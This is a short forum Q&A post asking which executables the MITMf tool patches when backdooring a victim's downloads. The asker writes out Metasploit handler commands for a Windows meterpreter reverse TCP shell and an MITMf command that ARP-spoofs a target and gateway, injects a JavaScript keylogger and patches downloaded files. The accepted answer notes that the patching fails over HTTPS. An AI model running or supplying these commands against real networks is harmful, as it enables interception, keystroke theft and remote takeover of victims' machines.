# MITMf which files can it patch

Tags: man-in-the-middle, meterpreter, mitmf

From this [tutorial](http://null-byte.wonderhowto.com/how-to/backdooring-fly-with-mitmf-0160383/) i found that it is possible using tool MITMf to patch exe files ''victim'' downloads in order to open a meterpreter shell. The commands that have been used are the following:

```
use exploit/multi/handler

set payloads windows/metepreter/reverse_tcp

set lhost 192.168.1.4 

set lport 4888 

exploit
```

to open meterpreter and

```
mitmf -i eth0 --arp --spoof --gateway 192.168.1.1 --target 192.168.1.8 --jskeylogger --filepwn
```

The problem is that it does not patch all exe files as it mentions in the tutorial too. So the question is which files does it patch and which not??

Answer (score 1, accepted):

PLease check this issue: https://github.com/byt3bl33d3r/MITMf/issues/280

MITMF use BDProxy to patch files, but it only works with non-ssl connections. Can you check if you are trying to download a file via HTTPS?

Check documentation for more information: https://github.com/secretsquirrel/BDFProxy.